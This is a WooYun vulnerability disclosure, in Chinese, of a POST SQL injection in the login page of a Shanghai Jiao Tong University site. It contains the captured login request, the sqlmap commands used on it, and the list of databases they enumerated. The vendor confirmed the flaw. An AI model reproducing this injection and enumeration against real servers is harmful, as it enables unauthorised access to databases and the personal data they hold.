当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-096538

漏洞标题:上海交通大学某站post注入

相关厂商:sjtu.edu.cn

漏洞作者: DloveJ

提交时间:2015-02-12 10:39

修复时间:2015-03-29 10:40

公开时间:2015-03-29 10:40

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-12: 细节已通知厂商并且等待厂商处理中
2015-02-12: 厂商已经确认,细节仅向厂商公开
2015-02-22: 细节向核心白帽子及相关领域专家公开
2015-03-04: 细节向普通白帽子公开
2015-03-14: 细节向实习白帽子公开
2015-03-29: 细节向公众公开

简要描述:

为啥诸如不下去了?、

详细说明:

http://mse.se.sjtu.edu.cn/Login.aspx


这里我们随便填写,然后抓包。。

POST /Login.aspx HTTP/1.1
Host: mse.se.sjtu.edu.cn
Proxy-Connection: keep-alive
Content-Length: 3166
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://mse.se.sjtu.edu.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://mse.se.sjtu.edu.cn/Login.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
__VIEWSTATE=%2FwEPDwULLTE1MDcxMTE2OTUPZBYEAgMPZBYCAgEPFgIeBFRleHQFwg88ZGl2IGNsYXNzPSJtZW51IiAgc3R5bGU9ImJhY2tncm91bmQtaW1hZ2U6dXJsKGltYWdlcy9wcmV2aWV3Ml8wNS5qcGcpOyB6LWluZGV4OjAiPgo8dWw%2BCgk8bGk%2BPGEgaHJlZj0iSW5kZXguYXNweCI%2B6aaW6aG1PC9hPjwvbGk%2BCgk8bGk%2BPGEgaHJlZj0iU3RhdGljLmFzcHg%2FSUQ9NTEiPuaLm%2BeUn%2BS%2FoeaBrzwvYT48L2xpPgoJPGxpPjxhIG9uY2xpY2s9InNob3doaWRlKDkpIiBocmVmPSIjIj7kuJPkuJrmlrnlkJE8L2E%2BPC9saT4KPGRpdiBjbGFzcz0ic3VibWVudSIgaWQ9InN1YjkiIHN0eWxlPSJwb3NpdGlvbjppbmhlcml0OyBmaWx0ZXI6YWxwaGEob3BhY2l0eT0wKTsgZGlzcGxheTpub25lOyB6LWluZGV4OjEiPgoJPHVsPgoJCTxsaT48YSBocmVmPSJTdGF0aWMuYXNweD9JRD0xNiI%2B6L2v5Lu257O757uf5byA5Y%2BR5oqA5pyvPC9hPjwvbGk%2BCgkJPGxpPjxhIGhyZWY9IlN0YXRpYy5hc3B4P0lEPTE0Ij5JVOmhueebrueuoeeQhjwvYT48L2xpPgoJCTxsaT48YSBocmVmPSJTdGF0aWMuYXNweD9JRD0xNSI%2B5bWM5YWl5byP57O757ufPC9hPjwvbGk%2BCgkJPGxpPjxhIGhyZWY9IlN0YXRpYy5hc3B4P0lEPTE3Ij7mlbDlrZfoibrmnK%2FkuI7mioDmnK88L2E%2BPC9saT4KCQk8bGk%2BPGEgaHJlZj0iU3RhdGljLmFzcHg%2FSUQ9MTkiPueJqea1geS4juS8geS4muS%2FoeaBr%2Bezu%2Be7nzwvYT48L2xpPgoJPC91bD4KPC9kaXY%2BCgk8bGk%2BPGEgaHJlZj0iU3RhdGljLmFzcHg%2FSUQ9MjEiPuW4iOi1hOmYn%2BS8jTwvYT48L2xpPgoJPGxpPjxhIG9uY2xpY2s9InNob3doaWRlKDExKSIgaHJlZj0iIyI%2B5Z%2B55YW75bel5L2cPC9hPjwvbGk%2BCjxkaXYgY2xhc3M9InN1Ym1lbnUiIGlkPSJzdWIxMSIgc3R5bGU9InBvc2l0aW9uOmluaGVyaXQ7IGZpbHRlcjphbHBoYShvcGFjaXR5PTApOyBkaXNwbGF5Om5vbmU7IHotaW5kZXg6MSI%2BCgk8dWw%2BCgkJPGxpPjxhIGhyZWY9IlN0YXRpYy5hc3B4P0lEPTIyIj7or77nqIvkvZPns7s8L2E%2BPC9saT4KCQk8bGk%2BPGEgaHJlZj0iU3RhdGljLmFzcHg%2FSUQ9MjMiPuivvueoi%2BeugOS7izwvYT48L2xpPgoJCTxsaT48YSBocmVmPSJTdGF0aWMuYXNweD9JRD0yNCI%2B6K%2B%2B56iL6KGoPC9hPjwvbGk%2BCgkJPGxpPjxhIGhyZWY9IlN0YXRpYy5hc3B4P0lEPTI1Ij7lrabkvY3orrrmloflt6XkvZzmtYHnqIs8L2E%2BPC9saT4KCTwvdWw%2BCjwvZGl2PgoJPGxpPjxhIGhyZWY9IkNsYXNzLmFzcHg%2FSUQ9MTIiPueuoeeQhuaWh%2BS7tjwvYT48L2xpPgoJPGxpPjxhIGhyZWY9IlN0YXRpYy5hc3B4P0lEPTMwIj7lrabkvY3lhazlkYo8L2E%2BPC9saT4KCTxsaT48YSBocmVmPSJDbGFzcy5hc3B4P0lEPTE0Ij7opoHpl7vpgJrlkYo8L2E%2BPC9saT4KCTxsaT48YSBvbmNsaWNrPSJzaG93aGlkZSgxNSkiIGhyZWY9IiMiPuWtpuWRmOS%2FoeaBrzwvYT48L2xpPgo8ZGl2IGNsYXNzPSJzdWJtZW51IiBpZD0ic3ViMTUiIHN0eWxlPSJwb3NpdGlvbjppbmhlcml0OyBmaWx0ZXI6YWxwaGEob3BhY2l0eT0wKTsgZGlzcGxheTpub25lOyB6LWluZGV4OjEiPgoJPHVsPgoJCTxsaT48YSBocmVmPSJTdGF0aWMuYXNweD9JRD0yOCI%2B5a2m5ZGY5Y%2BN6aaIPC9hPjwvbGk%2BCgkJPGxpPjxhIGhyZWY9IlN0YXRpYy5hc3B4P0lEPTI5Ij7mr5XkuJrkv6Hmga88L2E%2BPC9saT4KCTwvdWw%2BCjwvZGl2PgoJPGxpPjxhIG9uY2xpY2s9InNob3doaWRlKDM1KSIgaHJlZj0iIyI%2B6LWE5qC85a6h5p%2BlPC9hPjwvbGk%2BCjxkaXYgY2xhc3M9InN1Ym1lbnUiIGlkPSJzdWIzNSIgc3R5bGU9InBvc2l0aW9uOmluaGVyaXQ7IGZpbHRlcjphbHBoYShvcGFjaXR5PTApOyBkaXNwbGF5Om5vbmU7IHotaW5kZXg6MSI%2BCgk8dWw%2BCgkJPGxpPjxhIGhyZWY9Ii9SZWdpc3Rlci5hc3B4Ij7ms6jlhow8L2E%2BPC9saT4KCQk8bGk%2BPGEgaHJlZj0iL0xvZ2luLmFzcHgiPueZu%2BW9lTwvYT48L2xpPgoJPC91bD4KPC9kaXY%2BCgk8bGk%2BPGEgaHJlZj0iL1Njb3JlUXVlcnkuYXNweCI%2B5oiQ57up5p%2Bl6K%2BiPC9hPjwvbGk%2BCjwvdWw%2BCjwvZGl2PgpkAgUPZBYCAgUPFgQfAAUh6K%2B36L6T5YWl6Lqr5Lu96K%2BB5Y%2B356CB5LiO5a%2BG56CBHgdWaXNpYmxlZ2RkPJZz3dZt7T6Eh6wNIUkFHMdmKjs%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWBgLGzKexDALV18vLAwL%2Bkv37AgKgwImNCwKlwImNCwKmwImNC96hkkmV8xvqhxIGIWwVPHUUr7ul&identitycard=237942896&passwd=8069870943608&ctl03=%CC%E1++%BD%BB


交给sqlmap

-r 1.txt --dbs


available databases [20]:
[*] BeerOA
[*] LabCMS
[*] leo
[*] leo2
[*] lfg
[*] master
[*] model
[*] mouse
[*] msdb
[*] MSEdb
[*] Northwind
[*] OracleSEDB
[*] pubs
[*] SapSEDB
[*] sjtu
[*] sjtuback
[*] spacetour
[*] spacetour2
[*] tempdb
[*] VoteSystem

-r 1.txt --current-db


web server operating system: Windows
web application technology: ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[21:30:10] [INFO] fetching current database
current database:    'MSEdb'


漏洞证明:

不知

360截图20150209213135546.jpg

修复方案:

不知

版权声明:转载请注明来源 DloveJ@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-02-12 10:44

厂商回复:

我们尽快处理

最新状态:

暂无

漏洞评价:

评论